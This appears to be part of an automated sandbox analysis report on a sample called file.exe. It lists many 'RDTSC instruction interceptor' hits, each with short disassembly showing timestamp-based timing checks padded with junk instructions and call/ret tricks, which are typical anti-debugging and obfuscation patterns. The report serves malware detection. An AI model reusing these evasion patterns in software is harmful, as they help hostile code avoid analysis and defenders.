                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9413B0 second address: 941400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 jnp 00007FE83905447Ch 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 jg 00007FE839054476h 0x00000018 pop ebx 0x00000019 jns 00007FE83905449Eh 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943F9D second address: 943FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943FA1 second address: 943FA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943FFD second address: 944002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94419E second address: 9441A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FE839054476h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9441A8 second address: 9441AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9441AC second address: 9441BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944B8B second address: 944BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FE83906A388h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov si, AE41h 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jbe 00007FE83906A386h 0x00000030 je 00007FE83906A386h 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944F72 second address: 944F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9450A7 second address: 9450F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE83906A393h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FE83906A388h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b push ebx 0x0000002c pushad 0x0000002d popad 0x0000002e pop ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9450F0 second address: 945102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FE839054480h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945FDF second address: 945FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945E7F second address: 945E84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945FE3 second address: 945FF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94681D second address: 946822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946822 second address: 946839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE83906A393h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948567 second address: 94856D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94856D second address: 948571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949AD2 second address: 949AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949AD6 second address: 949ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949ADC second address: 949AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FE839054476h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949AE6 second address: 949AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9038FF second address: 903907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94F6EA second address: 94F703 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FE83906A38Ah 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950778 second address: 95077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95077C second address: 9507FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FE83906A388h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007FE83906A397h 0x00000029 push 00000000h 0x0000002b xor edi, 457CEFCCh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FE83906A388h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov ebx, dword ptr [ebp+122D2CC3h] 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 jl 00007FE83906A388h 0x0000005b pushad 0x0000005c popad 0x0000005d jl 00007FE83906A38Ch 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94F8B2 second address: 94F8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94F8B8 second address: 94F8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FE83906A386h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95186F second address: 951874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 952921 second address: 952928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 952928 second address: 952939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FE839054476h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951A1D second address: 951A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951A21 second address: 951A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FE839054476h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954B13 second address: 954B44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE83906A392h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953C24 second address: 953C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954C5D second address: 954C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954C63 second address: 954C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954C68 second address: 954C72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE83906A386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954C72 second address: 954C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955CFA second address: 955D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957DF3 second address: 957DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 958E01 second address: 958E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FE83906A38Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956E75 second address: 956E7F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956E7F second address: 956E84 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95804B second address: 958052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956E84 second address: 956E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 958052 second address: 958068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE839054482h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956E91 second address: 956E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DA09 second address: 95DA13 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DA13 second address: 95DA1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE83906A386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DA1D second address: 95DA94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054480h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FE839054478h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007FE839054478h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 mov ebx, eax 0x00000046 add edi, dword ptr [ebp+122D2C03h] 0x0000004c push 00000000h 0x0000004e mov bl, 64h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jng 00007FE839054478h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DBE9 second address: 95DBEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966A44 second address: 966A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906E21 second address: 906E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906E25 second address: 906E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906E29 second address: 906E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A392h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007FE83906A386h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906E4A second address: 906E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 970887 second address: 97088C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 970E0B second address: 970E11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 970E11 second address: 970E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971293 second address: 971299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9713EF second address: 9713FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9716D7 second address: 9716E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FE839054476h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9716E7 second address: 9716ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9716ED second address: 97170B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE839054476h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE83905447Ah 0x00000013 js 00007FE839054476h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97170B second address: 97170F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97170F second address: 97171B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97184F second address: 971855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971855 second address: 97185B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97185B second address: 971860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97713B second address: 977143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 977143 second address: 977148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901E13 second address: 901E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901E18 second address: 901E2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901E2D second address: 901E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE839054476h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942A35 second address: 942A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942A3C second address: 942A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942B6B second address: 942B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007FE83906A392h 0x0000000d jbe 00007FE83906A38Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943059 second address: 9430B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FE839054482h 0x0000000a popad 0x0000000b add dword ptr [esp], 1722A8A6h 0x00000012 mov ecx, 1B4C98CCh 0x00000017 call 00007FE839054479h 0x0000001c jmp 00007FE839054486h 0x00000021 push eax 0x00000022 ja 00007FE83905447Eh 0x00000028 jnp 00007FE839054478h 0x0000002e pushad 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9430B4 second address: 9430B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9430B9 second address: 9430DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054482h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnc 00007FE839054490h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9431EE second address: 943207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE83906A395h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943207 second address: 94320B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94320B second address: 94323B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b call 00007FE83906A399h 0x00000010 xor dword ptr [ebp+122D3337h], edi 0x00000016 pop edi 0x00000017 nop 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94323B second address: 943245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943245 second address: 943250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943250 second address: 943256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9434D8 second address: 9434E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jo 00007FE83906A394h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9434E8 second address: 9434EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943880 second address: 9438FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FE83906A388h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D1DF1h] 0x0000002d push 0000001Eh 0x0000002f jmp 00007FE83906A399h 0x00000034 nop 0x00000035 jnc 00007FE83906A38Eh 0x0000003b push eax 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9438FC second address: 943900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943900 second address: 943904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943CD5 second address: 943CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE839054476h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943CDF second address: 943D09 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d lea eax, dword ptr [ebp+124747D3h] 0x00000013 or ch, FFFFFFB5h 0x00000016 mov edi, dword ptr [ebp+122D2C03h] 0x0000001c nop 0x0000001d pushad 0x0000001e jc 00007FE83906A388h 0x00000024 push esi 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97687F second address: 976885 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
